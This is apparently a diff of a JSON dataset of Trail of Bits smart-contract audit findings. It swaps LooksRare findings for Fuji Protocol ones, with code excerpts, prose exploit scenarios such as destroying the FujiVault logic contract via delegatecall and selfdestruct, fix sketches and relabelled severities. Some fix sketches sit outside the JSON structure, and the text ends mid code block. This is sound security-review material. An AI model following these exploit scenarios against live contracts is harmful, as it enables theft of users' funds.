    IBean(unripeToken).burnFrom(msg.sender, amount);
    address underlyingToken = s.u[unripeToken].underlyingToken;
    IERC20(underlyingToken).sendToken(underlyingAmount, msg.sender, mode);
    emit Ripen(msg.sender, unripeToken, amount, underlyingAmount);
}

Figure 13.1: The ripen() function in UnripeFacet.sol#L51-

Exploit Scenario
Alice notices that the burnFrom function is implemented incorrectly in the unripeToken contract. She calls ripen with an amount greater than her unripe token balance and is able to receive the contract's entire balance of underlying tokens.

Recommendations
Short term, add an assert statement to ensure that users who call ripen have sufficient balance to burn the given amount of unripe tokens (sketched below). Long term, implement all security-critical assertions on user-supplied input in the beginning of external functions. Do not rely on untrusted code to perform required safety checks or to behave as expected.
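A minimal sketch of the short-term assertion, assuming the unripe token exposes the standard ERC20 balanceOf; only the added check is new relative to figure 13.1:

function ripen(
    address unripeToken,
    uint256 amount,
    LibTransfer.To mode
) external payable nonReentrant returns (uint256 underlyingAmount) {
    // Added check: fail fast on user input instead of trusting burnFrom to revert.
    require(
        IERC20(unripeToken).balanceOf(msg.sender) >= amount,
        \"UnripeFacet: insufficient unripe balance\"
    );
    // ... remainder as in figure 13.1 ...
}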
",
 "labels": [
 "Trail of Bits",
- "Severity: Low",
- "Difficulty: Low"
+ "Severity: Informational",
+ "Difficulty: Undetermined"
 ]
 },
 {
- "title": "3. Project dependencies contain vulnerabilities ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf",
- "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identified a dependency with a known vulnerability. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details the high severity issue: CVE ID",
+ "title": "1. Anyone can destroy the FujiVault logic contract if its initialize function was not called during deployment ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf",
+ "body": "Anyone can destroy the FujiVault logic contract if its initialize function has not already been called. Calling initialize on a logic contract is uncommon, as usually nothing is gained by doing so. The deployment script does not call initialize on any logic contract. As a result, the exploit scenario detailed below is possible after deployment. This issue is similar to a bug in Aave that was found in 2020. OpenZeppelin's hardhat-upgrades plug-in protects against this issue by disallowing the use of selfdestruct or delegatecall on logic contracts. However, the Fuji Protocol team has explicitly worked around these protections by calling delegatecall in assembly, which the plug-in does not detect.

Exploit Scenario
The Fuji contracts are deployed, but the initialize functions of the logic contracts are not called. Bob, an attacker, deploys a contract to the address alwaysSelfdestructs, which simply always executes the selfdestruct opcode. Additionally, Bob deploys a contract to the address alwaysSucceeds, which simply never reverts. Bob calls initialize on the FujiVault logic contract, thereby becoming its owner. To make the call succeed, Bob passes 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE as the value for the _collateralAsset and _borrowAsset parameters. He then calls FujiVaultLogic.setActiveProvider(alwaysSelfdestructs), followed by FujiVault.setFujiERC1155(alwaysSucceeds) to prevent an additional revert in the next and final call. Finally, Bob calls FujiVault.deposit(1), sending 1 wei. This triggers a delegatecall to alwaysSelfdestructs, thereby destroying the FujiVault logic contract and making the protocol unusable until its proxy contract is upgraded. Because OpenZeppelin's upgradeable contracts do not check for a contract's existence before a delegatecall (TOB-FUJI-003), all calls to the FujiVault proxy contract now succeed. This leads to exploits in any protocol integrating the Fuji Protocol. For example, a call that should repay all debt will now succeed even if no debt is repaid.

Recommendations
Short term, do not use delegatecall to implement providers. See TOB-FUJI-002 for more information. Long term, avoid the use of delegatecall, as it is difficult to use correctly and can introduce vulnerabilities that are hard to detect.",
 "labels": [
 "Trail of Bits",
 "Severity: High",
- "Difficulty: Undetermined"
+ "Difficulty: Medium"
 ]
 },
 {
- "title": "4. Users that create ask orders cannot modify minPercentageToAsk ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf",
- "body": "Users who sell their NFTs on LooksRare are unable to protect their orders against arbitrary changes in royalty fees set by NFT collection owners; as a result, users may receive less of a sale's value than expected. Ideally, when a user lists an NFT, he should be able to set a threshold at which the transaction will execute based on the amount of the sale's value that he will receive. This threshold is set via the minPercentageToAsk variable in the MakerOrder and TakerOrder structs. The minPercentageToAsk variable protects users who create ask orders from excessive royalty fees.
When funds from an order are transferred, the LooksRareExchange contract ensures that the percentage amount that needs to be transferred to the recipient is greater than or equal to minPercentageToAsk (figure 4.1).

function _transferFeesAndFunds(
    address strategy,
    address collection,
    uint256 tokenId,
    address currency,
    address from,
    address to,
    uint256 amount,
    uint256 minPercentageToAsk
) internal {
    // Initialize the final amount that is transferred to seller
    uint256 finalSellerAmount = amount;

    // 1. Protocol fee
    {
        uint256 protocolFeeAmount = _calculateProtocolFee(strategy, amount);
        [...]
        finalSellerAmount -= protocolFeeAmount;
    }

    // 2. Royalty fee
    {
        (address royaltyFeeRecipient, uint256 royaltyFeeAmount) =
            royaltyFeeManager.calculateRoyaltyFeeAndGetRecipient(
                collection, tokenId, amount
            );
        // Check if there is a royalty fee and that it is different to 0
        [...]
        finalSellerAmount -= royaltyFeeAmount;
        [...]
    }
    require(
        (finalSellerAmount * 10000) >= (minPercentageToAsk * amount),
        \"Fees: Higher than expected\"
    );
    [...]
}

Figure 4.1: The _transferFeesAndFunds function in LooksRareExchange:422-466

However, users creating ask orders cannot modify minPercentageToAsk. By default, the minPercentageToAsk of orders placed through the LooksRare platform is set to 85%. In cases in which there is no royalty fee and the protocol fee is 2%, minPercentageToAsk could be set to 98%.

Exploit Scenario
Alice lists an NFT for sale on LooksRare. The protocol fee is 2%, minPercentageToAsk is 85%, and there is no royalty fee. The NFT project grows in popularity, which motivates Eve, the owner of the NFT collection, to raise the royalty fee to 9.5%, the maximum fee allowed by the RoyaltyFeeRegistry contract. Bob purchases Alice's NFT. Alice receives 88.5% of the sale even though she could have received 98% of the sale at the time of the listing.

Recommendations
Short term, set minPercentageToAsk to 100% minus the sum of the protocol fee and the max value for a royalty fee, which is 9.5%. Long term, identify and validate the bounds for all parameters and variables in the smart contract system.",
+ "title": "2. Providers are implemented with delegatecall ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf",
+ "body": "The system uses delegatecall to execute an active provider's code on a FujiVault, making the FujiVault the holder of the positions in the borrowing protocol. However, delegatecall is generally error-prone, and its use introduced the high-severity finding TOB-FUJI-001. It is possible to make a FujiVault the holder of the positions in a borrowing protocol without using delegatecall. Most borrowing protocols include a parameter that specifies the receiver of tokens that represent a position. For borrowing protocols that do not include this type of parameter, tokens can be transferred to the FujiVault explicitly after they are received from the borrowing protocol; additionally, the tokens can be transferred from the FujiVault to the provider before they are sent to the borrowing protocol. These solutions are conceptually simpler than and preferred to the current solution.

Recommendations
Short term, implement providers without the use of delegatecall. Set the receiver parameters to the FujiVault, or transfer the tokens corresponding to the position to the FujiVault (a sketch follows below). Long term, avoid the use of delegatecall, as it is difficult to use correctly and can introduce vulnerabilities that are hard to detect.
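A minimal sketch of a provider that uses a plain external call, assuming an Aave-V2-style onBehalfOf parameter (the interface, contract, and function names below are illustrative, not Fuji's actual code):

interface ILendingPoolLike {
    // mirrors Aave V2's LendingPool.deposit signature
    function deposit(address asset, uint256 amount, address onBehalfOf, uint16 referralCode) external;
}

contract ProviderSketch {
    ILendingPoolLike public immutable pool;

    constructor(ILendingPoolLike _pool) {
        pool = _pool;
    }

    // Called with a regular external call; the position is credited directly
    // to the vault, so no delegatecall is needed.
    function depositFor(address vault, address asset, uint256 amount) external {
        // assumes the tokens were transferred to this provider and approved beforehand
        pool.deposit(asset, amount, vault, 0);
    }
}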
",
 "labels": [
 "Trail of Bits",
- "Severity: Undetermined",
+ "Severity: Informational",
 "Difficulty: Undetermined"
 ]
 },
 {
- "title": "5. Excessive privileges of RoyaltyFeeSetter and RoyaltyFeeRegistry owners ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf",
- "body": "The RoyaltyFeeSetter and RoyaltyFeeRegistry contract owners can manipulate an NFT collection's royalty information, such as the fee percentage and the fee receiver; this violates the principle of least privilege. NFT collection owners can use the RoyaltyFeeSetter contract to set the royalty information for their NFT collections. This information is stored in the RoyaltyFeeRegistry contract. However, the owners of the two contracts can also update this information (figures 5.1 and 5.2).

function updateRoyaltyInfoForCollection(
    address collection,
    address setter,
    address receiver,
    uint256 fee
) external override onlyOwner {
    require(fee <= royaltyFeeLimit, \"Registry: Royalty fee too high\");
    _royaltyFeeInfoCollection[collection] = FeeInfo({
        setter: setter,
        receiver: receiver,
        fee: fee
    });
    emit RoyaltyFeeUpdate(collection, setter, receiver, fee);
}

Figure 5.1: The updateRoyaltyInfoForCollection function in RoyaltyFeeRegistry:54-

function updateRoyaltyInfoForCollection(
    address collection,
    address setter,
    address receiver,
    uint256 fee
) external onlyOwner {
    IRoyaltyFeeRegistry(royaltyFeeRegistry).updateRoyaltyInfoForCollection(
        collection, setter, receiver, fee
    );
}

Figure 5.2: The updateRoyaltyInfoForCollection function in RoyaltyFeeSetter:102-109

This violates the principle of least privilege. Since it is the responsibility of the NFT collection's owner to set the royalty information, it is unnecessary for contract owners to have the same ability.

Exploit Scenario
Alice, the owner of the RoyaltyFeeSetter contract, sets the incorrect receiver address when updating the royalty information for Bob's NFT collection. Bob is now unable to receive fees from his NFT collection's secondary sales.

Recommendations
Short term, remove the contract owners' ability to update an NFT collection's royalty information. Long term, clearly document the responsibilities and levels of access provided to privileged users of the system.

6. Insufficient protection of sensitive information
Severity: Low Difficulty: High
Type: Configuration Finding ID: TOB-LR-6
Target: contracts/hardhat.config.ts",
 "labels": [
 "Trail of Bits",
- "Severity: Low",
+ "Severity: High",
 "Difficulty: High"
 ]
 },
 {
+ "title": "3. Lack of contract existence check on delegatecall will result in unexpected behavior ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf",
+ "body": "The VaultControlUpgradeable and Proxy contracts use the delegatecall proxy pattern. If the implementation contract is incorrectly set or self-destructed, the contract may not be able to detect failed executions. The VaultControlUpgradeable contract includes the _execute function, which users can invoke indirectly to execute a transaction to a _target address. This function does not check for contract existence before executing the delegatecall (figure 3.1).
/** * @dev Returns byte response of delegatcalls */ function _execute(address _target, bytes memory _data) internal whenNotPaused returns (bytes memory response) { /* solhint-disable */ assembly { let succeeded := delegatecall(sub(gas(), 5000), _target, add(_data, 0x20), mload(_data), 0, 0) let size := returndatasize() response := mload(0x40) mstore(0x40, add(response, and(add(add(size, 0x20), 0x1f), not(0x1f)))) mstore(response, size) returndatacopy(add(response, 0x20), 0, size) switch iszero(succeeded) case 1 { // throw if delegatecall failed revert(add(response, 0x20), size) } } /* solhint-disable */ } Figure 3.1: fuji-protocol/contracts/abstracts/vault/VaultBaseUpgradeable.sol#L93-L115 The Proxy contract, deployed by the @openzeppelin/hardhat-upgrades library, includes a payable fallback function that invokes the _delegate function when proxy calls are executed. This function is also missing a contract existence check (figure 3.2). /** * @dev Delegates the current call to `implementation`. * * This function does not return to its internal call site, it will return directly to the external caller. */ function _delegate(address implementation) internal virtual { // solhint-disable-next-line no-inline-assembly assembly { // Copy msg.data. We take full control of memory in this inline assembly // block because it will not return to Solidity code. We overwrite the // Solidity scratch pad at memory position 0. calldatacopy(0, 0, calldatasize()) // Call the implementation. // out and outsize are 0 because we don't know the size yet. let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0) // Copy the returned data. returndatacopy(0, 0, returndatasize()) switch result // delegatecall returns 0 on error. case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } } Figure 3.2: Proxy.sol#L16-L41 A delegatecall to a destructed contract will return success (figure 3.3). Due to the lack of contract existence checks, a series of batched transactions may appear to be successful even if one of the transactions fails. The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 3.3: A snippet of the Solidity documentation detailing unexpected behavior related to delegatecall Exploit Scenario Eve upgrades the proxy to point to an incorrect new implementation. As a result, each delegatecall returns success without changing the state or executing code. Eve uses this to scam users. Recommendations Short term, implement a contract existence check before any delegatecall. Document the fact that suicide and selfdestruct can lead to unexpected behavior, and prevent future upgrades from using these functions. Long term, carefully review the Solidity documentation, especially the Warnings section, and the pitfalls of using the delegatecall proxy pattern. References Contract Upgrade Anti-Patterns Breaking Aave Upgradeability", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: High" ] }, {
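A minimal sketch of the recommended guard, assuming a Solidity >=0.8.1 target where address.code is available; the function shell and error strings are illustrative, not the project's code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

contract ExecutorSketch {
    // Verify that code exists at the target before delegatecalling, so a
    // call to a destructed or never-deployed implementation cannot
    // silently "succeed".
    function _execute(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        require(target.code.length > 0, "target is not a contract");
        (bool ok, bytes memory response) = target.delegatecall(data);
        require(ok, "delegatecall failed");
        return response;
    }
}
```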
- "title": "7. Contracts used as dependencies do not track upstream changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare codebase uses a third-party contract, SignatureChecker , but the LooksRare documentation does not specify which version of the contract is used or whether it was modified. This indicates that the LooksRare protocol does not track upstream changes in contracts used as dependencies. Therefore, the LooksRare contracts may not reliably reflect updates or security fixes implemented in their dependencies, as those updates must be manually integrated into the contracts. Exploit Scenario A third-party contract used in LooksRare receives an update with a critical fix for a vulnerability, but the update is not manually integrated in the LooksRare version of the contract. An attacker detects the use of a vulnerable contract in the LooksRare protocol and exploits the vulnerability against one of the contracts. Recommendations Short term, review the codebase and document the source and version of each dependency. Include third-party sources as submodules in the project's Git repository to maintain internal path consistency and ensure that dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", + "title": "4. FujiVault.setFactor is unnecessarily complex and does not properly handle invalid input ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiVault contract's setFactor function sets one of four state variables to a given value. Which state variable is set depends on the value of a string parameter. If an invalid value is passed, setFactor succeeds but does not set any of the state variables. This creates edge cases, makes writing correct code more difficult, and increases the likelihood of bugs. function setFactor( uint64 _newFactorA, uint64 _newFactorB, string calldata _type ) external isAuthorized { bytes32 typeHash = keccak256(abi.encode(_type)); if (typeHash == keccak256(abi.encode(\"collatF\"))) { collatF.a = _newFactorA; collatF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"safetyF\"))) { safetyF.a = _newFactorA; safetyF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"bonusLiqF\"))) { bonusLiqF.a = _newFactorA; bonusLiqF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"protocolFee\"))) { protocolFee.a = _newFactorA; protocolFee.b = _newFactorB; } } Figure 4.1: FujiVault.sol#L475-494 Exploit Scenario A developer on the Fuji Protocol team calls setFactor from another contract. He passes a type that is not handled by setFactor. As a result, code that is expected to set a state variable does nothing, resulting in a more severe vulnerability. Recommendations Short term, replace setFactor with four separate functions, each of which sets one of the four state variables. Long term, avoid string constants that simulate enumerations, as they cannot be checked by the typechecker. Instead, use enums and ensure that any code that depends on enum values handles all possible values.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, {
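A sketch of the long-term recommendation: replacing the string-keyed dispatch with an enum, so that the compiler and the ABI decoder reject unknown factor types instead of silently doing nothing. The names mirror the finding but are illustrative:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract FactorSketch {
    struct Factor {
        uint64 a;
        uint64 b;
    }

    enum FactorType {
        Collateral,
        Safety,
        BonusLiquidation,
        ProtocolFee
    }

    mapping(FactorType => Factor) public factors;

    // A value outside the enum's range makes the call revert during ABI
    // decoding, so "succeeds but sets nothing" is no longer possible.
    function setFactor(FactorType factorType, uint64 a, uint64 b) external {
        factors[factorType] = Factor(a, b);
    }
}
```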
- "title": "8. Missing event for a critical operation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The system does not emit an event when a protocol fee is levied in the _transferFeesAndFunds and _transferFeesAndFundsWithWETH functions. Operations that transfer value or perform critical operations should trigger events so that users and off-chain monitoring tools can account for important state changes. if ((protocolFeeRecipient != address (0)) && (protocolFeeAmount != 0)) { IERC20(currency).safeTransferFrom(from, protocolFeeRecipient, protocolFeeAmount); finalSellerAmount -= protocolFeeAmount; } Figure 8.1: Protocol fee transfer in _transferFeesAndFunds function ( contracts/executionStrategies/StrategyDutchAuction.sol#L440-L443 ) Exploit Scenario A smart contract wallet provider has a LooksRare integration that enables its users to buy and sell NFTs. The front end relies on information from LooksRare's subgraph to itemize prices, royalties, and fees. Because the system does not emit an event when a protocol fee is incurred, an under-calculation in the wallet provider's accounting leads its users to believe they have been overcharged. Recommendations Short term, add events for all critical operations that transfer value, such as when a protocol fee is assessed. Events are vital aids in monitoring contracts and detecting suspicious behavior. Long term, consider adding or accounting for a new protocol fee event in the LooksRare subgraph and any other off-chain monitoring tools LooksRare might be using.", + "title": "5. Preconditions specified in docstrings are not checked by functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The docstrings of several functions specify preconditions that the functions do not automatically check for. For example, the docstring of the FujiVault contract's setFactor function contains the preconditions shown in figure 5.1, but the function's body does not contain the corresponding checks shown in figure 5.2. * For safetyF; Sets Safety Factor of Vault, should be > 1, a/b * For collatF; Sets Collateral Factor of Vault, should be > 1, a/b Figure 5.1: FujiVault.sol#L469-470 require(safetyF.a > safetyF.b); ... require(collatF.a > collatF.b); Figure 5.2: The checks that are missing from FujiVault.setFactor Additionally, the docstring of the Controller contract's doRefinancing function contains the preconditions shown in figure 5.3, but the function's body does not contain the corresponding checks shown in figure 5.4. * @param _ratioB: _ratioA/_ratioB <= 1, and > 0 Figure 5.3: Controller.sol#L41 require(ratioA > 0 && ratioB > 0); require(ratioA <= ratioB); Figure 5.4: The checks that are missing from Controller.doRefinancing Exploit Scenario The setFactor function is called with values that violate its documented preconditions. Because the function does not check for these preconditions, unexpected behavior occurs. Recommendations Short term, add checks for preconditions to all functions with preconditions specified in their docstrings. Long term, ensure that all documentation and code are in sync.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, {
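As a sketch of the short-term recommendation, the documented preconditions of doRefinancing could become explicit checks at function entry; the checks follow figure 5.4, while the function shell and error strings are illustrative:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract RefinancingSketch {
    // Callers that violate the documented preconditions now revert
    // instead of proceeding with invalid ratios.
    function doRefinancing(uint256 ratioA, uint256 ratioB) external pure {
        require(ratioA > 0 && ratioB > 0, "ratios must be positive");
        require(ratioA <= ratioB, "ratioA/ratioB must be <= 1");
        // ... refinancing logic would follow ...
    }
}
```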
- "title": "9. Taker orders are not EIP-712 signatures ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "When takers attempt to match order proposals, they are presented with an obscure blob of data. In contrast, makers are presented with a formatted data structure that makes it easier to validate transactions. struct TakerOrder { bool isOrderAsk ; // true --> ask / false --> bid address taker ; // msg.sender uint256 price ; // final price for the purchase uint256 tokenId ; uint256 minPercentageToAsk ; // slippage protection (9000 --> 90% of the final price must return to ask) bytes params ; // other params (e.g., tokenId) } Figure 9.1: The TakerOrder struct in OrderTypes.sol:31-38 While this issue cannot be exploited directly, it creates an asymmetry between the user experience (UX) of makers and takers. Because of this, users depend on the information that the user interface (UI) displays to them and are limited by the UX of the wallet software they are using. Exploit Scenario 1 Eve, a malicious user, lists a new collection with the same metadata as another, more popular collection. Bob sees Eve's listing and thinks that it is the legitimate collection. He creates an order for an NFT in Eve's collection, and because he cannot distinguish the parameters of the transaction he is signing, he matches it, losing money in the process. Exploit Scenario 2 Alice, an attacker, compromises the UI, allowing her to manipulate the information displayed by it in order to make illegitimate collections look legitimate. This is a more extreme exploit scenario. Recommendations Short term, evaluate and document the current UI and the pitfalls that users might encounter when matching and creating orders. Long term, evaluate whether adding support for EIP-712 signatures in TakerOrder would minimize the issue and provide a better UX.", + "title": "6. The FujiERC1155.burnBatch function implementation is incorrect ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiERC1155 contract's burnBatch function deducts the unscaled amount from the user's balance and from the total supply of an asset. If the liquidity index of an asset (indexes[assetId]) is different from its initialized value, the execution of burnBatch could result in unintended arithmetic calculations. Instead of deducting the amount value, the function should deduct the amountScaled value. function burnBatch( address _account, uint256[] memory _ids, uint256[] memory _amounts ) external onlyPermit { require(_account != address(0), Errors.VL_ZERO_ADDR_1155); require(_ids.length == _amounts.length, Errors.VL_INPUT_ERROR); address operator = _msgSender(); uint256 accountBalance; uint256 assetTotalBalance; uint256 amountScaled; for (uint256 i = 0; i < _ids.length; i++) { uint256 amount = _amounts[i]; accountBalance = _balances[_ids[i]][_account]; assetTotalBalance = _totalSupply[_ids[i]]; amountScaled = _amounts[i].rayDiv(indexes[_ids[i]]); require(amountScaled != 0 && accountBalance >= amountScaled, Errors.VL_INVALID_BURN_AMOUNT); _balances[_ids[i]][_account] = accountBalance - amount; _totalSupply[_ids[i]] = assetTotalBalance - amount; } emit TransferBatch(operator, _account, address(0), _ids, _amounts); } Figure 6.1: FujiERC1155.sol#L218-247
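A minimal sketch of the corrected deduction, in which the validated scaled amount is also the amount deducted; the ray division is reduced to a plain division for brevity, and all names are illustrative:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract BurnSketch {
    mapping(uint256 => mapping(address => uint256)) internal _balances;
    mapping(uint256 => uint256) internal _totalSupply;
    mapping(uint256 => uint256) public indexes; // liquidity index per asset

    // The scaled amount that is validated is the amount deducted, keeping
    // balances and total supply consistent with the index.
    function _burn(address account, uint256 id, uint256 amount) internal {
        uint256 amountScaled = amount / indexes[id]; // stand-in for rayDiv
        uint256 accountBalance = _balances[id][account];
        require(amountScaled != 0 && accountBalance >= amountScaled, "invalid burn amount");
        _balances[id][account] = accountBalance - amountScaled;
        _totalSupply[id] -= amountScaled;
    }
}
```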
Exploit Scenario The burnBatch function is called with an asset for which the liquidity index is different from its initialized value. Because amount was used instead of amountScaled, unexpected behavior occurs. Recommendations Short term, revise the burnBatch function so that it uses amountScaled instead of amount when updating a user's balance and the total supply of an asset. Long term, use the burn function in the burnBatch function to keep functionality consistent.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: High", + "Difficulty: Low" ] }, { - "title": "10. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the LooksRare contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "7. Error in the white paper's equation for the cost of refinancing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The white paper uses the following equation (equation 4) to describe how the cost of refinancing is calculated: cost = D + f1 + f2 + f3 + f4, where D is the amount of debt to be refinanced and is a summand of the equation. This is incorrect, as it implies that the refinancing cost is always greater than the amount of debt to be refinanced. A correct version of the equation could be cost = f1 + f2 + f3 + f4, in which each fi is an amount, or cost = f1 + f2 + D * r, in which r is a percentage. Recommendations Short term, fix equation 4 in the white paper. Long term, ensure that the equations in the white paper are correct and in sync with the implementation.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Undetermined" ] }, { - "title": "11. isContract may behave unexpectedly ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare exchange relies on OpenZeppelin's SignatureChecker library to verify signatures on-chain. This library, in turn, relies on the isContract function in the Address library to determine whether the signer is a contract or an externally owned account (EOA).
However, in Solidity, there is no reliable way to definitively determine whether a given address is a contract, as there are several edge cases in which the underlying extcodesize function can return unexpected results. function isContract( address account) internal view returns ( bool ) { // This method relies on extcodesize, which returns 0 for contracts in // construction, since the code is only stored at the end of the // constructor execution. uint256 size; assembly { size := extcodesize (account) } return size > 0; } Figure 11.1: The isContract function in Address.sol#L27-37 Exploit Scenario A maker order is created and signed by a smart contract wallet. While this order is waiting to be filled, selfdestruct is called on the contract. The call to extcodesize returns 0, causing isContract to return false. Even though the order was signed by an ERC1271-compatible contract, the verify method will attempt to validate the signer's address as though it were signed by an EOA. Recommendations Short term, clearly document for developers that SignatureChecker.verify is not guaranteed to accurately distinguish between an EOA and a contract signer, and emphasize that it should never be used in a manner that requires such a guarantee. Long term, avoid adding or altering functionality that would rely on a guarantee that a signature's source remains consistent over time.", + "title": "8. Errors in the white paper's equation for index calculation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The white paper uses the following equation (equation 1) to describe how the index I_t for a given token at timestamp t is calculated: I_t = I_{t-1} + (B_{t-1} - B_t) / B_{t-1}. B_t is the amount of the given token that the Fuji Protocol owes the provider (the borrowing protocol) at timestamp t. The index is updated only when the balance changes through the accrual of interest, not when the balance changes through borrowing or repayment operations. This means that (B_{t-1} - B_t) / B_{t-1} is always negative, which is incorrect, as it should calculate the interest rate since the last index update. The index represents the total interest rate since the deployment of the protocol. It is the product of the various interest rates accrued on the active providers during the lifetime of the protocol (measured only during state-changing interactions with the provider): r_t * ... * r_3 * r_2 * r_1. A user's current balance is computed by taking the user's initial stored balance, multiplying it by the current index, and dividing it by the index at the time of the creation of that user's position. The division operation ensures that the user will not owe interest that accrued before the creation of the user's position. The index provides an efficient way to keep track of interest rates without having to update each user's balance separately, which would be prohibitively expensive on Ethereum. However, interest is compounded through multiplication, not addition. The formula should use the product sign instead of the plus sign. Exploit Scenario Alice decides to use the Fuji Protocol after reading the white paper. She later learns that calculations in the white paper do not match the implementations in the protocol. Because Alice allocated her funds based on her understanding of the specification, she loses funds. Recommendations Short term, replace equation 1 in the white paper with a correct and simplified version: I_t = I_{t-1} * B_t / B_{t-1}. For more information on the simplified version, see finding TOB-FUJI-015.
Long term, ensure that the equations in the white paper are correct and in sync with the implementation.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: Undetermined" ] }, { - "title": "12. tokenId and amount fully controlled by the order strategy when matching two orders ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "When two orders are matched, the strategy defined by the MakerOrder is called to check whether the order can be executed. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Retrieve execution parameters ( bool isExecutionValid , uint256 tokenId , uint256 amount ) = IExecutionStrategy(makerAsk.strategy) .canExecuteTakerBid(takerBid, makerAsk); require (isExecutionValid, \"Strategy: Execution invalid\" ); [...] } Figure 12.1: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#186-212 ) The strategy call returns a boolean indicating whether the order match can be executed, the tokenId to be sold, and the amount to be transferred. The LooksRareExchange contract does not verify these last two values, which means that the strategy has full control over them. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Execution part 1/2 _transferFeesAndFundsWithWETH( makerAsk.strategy, makerAsk.collection, tokenId, makerAsk.signer, takerBid.price, makerAsk.minPercentageToAsk ); // Execution part 2/2 _transferNonFungibleToken(makerAsk.collection, makerAsk.signer, takerBid.taker, tokenId, amount); emit TakerBid( askHash, makerAsk.nonce, takerBid.taker, makerAsk.signer, makerAsk.strategy, makerAsk.currency, makerAsk.collection, tokenId, amount, takerBid.price ); } Figure 12.2: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#217-228 ) This ultimately means that a faulty or malicious strategy can cause a loss of funds (e.g., by returning a different tokenId from the one that was intended to be sold or bought). Additionally, this issue may become problematic if strategies become trustless and are no longer developed or allowlisted by the LooksRare team. Exploit Scenario A faulty strategy, which returns a different tokenId than expected, is allowlisted in the protocol. Alice creates a new order using that strategy to sell one of her tokens. Bob matches Alice's order, but because the tokenId is not validated before executing the order, he gets a different token than he intended to buy. Recommendations Short term, evaluate and document this behavior and use this documentation when integrating new strategies into the protocol. Long term, consider adding further safeguards to the LooksRareExchange contract to check the validity of the tokenId and the amount returned by the call to the strategy.", + "title": "9. FujiERC1155.setURI does not adhere to the EIP-1155 specification ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiERC1155 contract's setURI function does not emit the URI event.
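A minimal sketch of a compliant setter, which stores the new value and emits the URI event defined by EIP-1155; emitting id 0 for a URI that applies to all token types is an illustrative assumption, as the standard scopes the event to a single id. The contract's actual implementation, shown in figure 9.1 below, omits the event:

```solidity
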